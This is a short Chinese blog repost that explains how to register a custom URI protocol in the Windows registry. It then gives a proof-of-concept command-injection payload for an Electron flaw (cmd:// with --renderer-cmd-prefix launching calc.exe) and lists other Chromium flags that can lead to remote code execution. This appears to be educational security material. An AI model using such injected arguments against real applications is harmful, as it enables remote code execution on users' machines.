Windows配置注册表注册伪协议

1、新建伪协议项

WIN+R 输入regedit 打开注册表,在注册表HKEY_CLASSES_ROOT键中新建一个项,项的名字就是你伪协议的名字,例如我注册一个cmd协议。

然后不用管默认字符串值,新建一个叫URL Procotol的字符串值,值为空即可。

2、新建shell项

在cmd协议项中新建一个项 , 叫做shell,这个名称不能改。默认字符串值为空

3、新建open项

在shell项中新建一个项 , 叫做open,这个名称不能改。默认字符串值为空

4、新建command项

在open项中新建一个项 , 叫做command,这个名称不能改。默认字符串值为可执行文件路径和参数等

远程命令执行漏洞

根据这个地方的参数引号闭合情况去构造payload,类似SQL注入

  • 是%1 则payload:href='cmd://123 --renderer-cmd-prefix="cmd.exe /c start calc.exe" '
  • 要是“%1”则payload:href='cmd://123" --renderer-cmd-prefix="cmd.exe /c start calc.exe '
    效果(备注这里需要使用IE内核测试):

其他引起RCE的参数如下:

  • --renderer-cmd-prefix
  • --gpu-launcher
  • --utility-cmd-prefix
  • --ppapi-plugin-launcher
  • --nacl-gdb
  • --ppapi-flash-path
  • --ppapi-flash-args

参考文献:

Electron 自定义协议命令注入(CVE-2018-1000006)分析和 Url Scheme 安全考古

转载于:https://www.cnblogs.com/KevinGeorge/p/10201295.html

URI Scheme注册伪协议实现远程命令执行相关推荐

  1. Tomcat- AJP协议文件读取/命令执行漏洞(CVE-2020-1938 / CNVD-2020-10487)

    CVE-2020-1938 1.概述 1.1 tomcat概述 1.2 gostcat概述 - 漏洞概述 2. 漏洞成因 2.1 前置基础 2.1.1 Tomcat Connector(连接器) 2. ...

  2. Windows更新+中间人=远程命令执行

    小飞 · 2015/11/26 15:57 0x00 Windows Server Update Services WSUS是Windows Server Update Services的简称.利用这 ...

  3. Firefox 31~34远程命令执行漏洞的分析

    phith0n · 2015/03/26 17:47 0x00 前言 前段时间,二哥在很多浏览器中将脚本层面的漏洞提升为远程命令执行,几乎日遍市面上所有国产浏览器,这成为了许多人津津乐道的话题.确实, ...

  4. flexpaper php 代码,FlexPaper 2.3.6 远程命令执行漏洞 附Exp

    影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...

  5. buuctf刷题9 (反序列化逃逸shtml-SSI远程命令执行idna与utf-8编码漏洞)

    目录 安洵杯2019 easy_serialize_php (反序列化中的对象逃逸) [0CTF 2016]piapiapia(反序列化逃逸) [BJDCTF2020]EasySearch(Apach ...

  6. Fastjson远程命令执行漏洞总结

    1.FastJson 简介 fastjson.jar包原始下载地址:https://github.com/alibaba/fastjson fastjson用于将Java Bean序列化为JSON字符 ...

  7. 又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析

    本文讲的是又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析, 早在2015年,FireEye曾发布过两次关于Office的Encapsulated PostScript (EPS)图形文 ...

  8. 详述WebLogic反序列化远程命令执行漏洞的处理过程,云和恩墨技术通讯精选

    各位亲爱的用户/读者朋友们: 为了及时共享行业案例,通告共性问题,达成知识共享和提前预防,我们整理和编辑了<云和恩墨技术通讯>(5月刊),通过对过去一段时间的知识回顾和故障归纳,以期提供有 ...

  9. windows远程命令执行

    以下所有实验均在工作组环境下 psexec psexec.exe \\ip –accepteula -u username -p password program.exe psexec.exe \\h ...

最新文章

  1. 给 K8s API “做减法”:阿里巴巴云原生应用管理的挑战和实践
  2. LeetCode 773. 滑动谜题(BFS 地图状态转换的最短距离)
  3. Java-泛型T T与T的用法
  4. 多线程-AbstractQueuedSynchronizer(AQS)
  5. PHPMailer 报错:SMTP ERROR: Password command failed: 535 Login Fail
  6. 百度用户增长SQL面试题
  7. 云计算与云原生 — ETCD 数据库完全解析
  8. C语言之父丹尼斯·里奇:乔布斯脚下的巨人肩膀
  9. 微信公众号开发:账号申请与接入
  10. 在有C语言的基础上,快速学习python(C语言转战python)(python3)
  11. 全国计算机考试比省级的难吗,国考和省考考题的区别,难度差异很大吗?
  12. Linux下的文件及文件后缀名
  13. 电子邮件营销有哪些方法?
  14. 汽车4S店业务管理软件
  15. win7 visual studio code安装和使用
  16. 计算机管理usb出现问号,USB设备全部都是问号,求助?
  17. 你不知道的颠覆式创新者
  18. 一份游戏策划书的范例[转载]
  19. 360度全景图像制作
  20. 2022第七届少儿模特明星盛典 全国总决赛精彩直击

热门文章

  1. 数据恢复软件哪个好用比特数据恢复当仁不让
  2. css深入理解之overflow
  3. jQuery remove 内存 释放
  4. Spring.Net+NHibenate+Asp.Net mvc +ExtJs 系列 3 ----数据访问层
  5. Spring Web Flow实例教程
  6. 【springmvc+mybatis项目实战】杰信商贸-6.重点知识回顾
  7. Activity详细解释(生命周期、以各种方式启动Activity、状态保存,等完全退出)...
  8. 全球增长最快域名解析商Top10:DNSPod新网上榜
  9. hadoop配置文件默认配置
  10. python基础学习笔记(十三)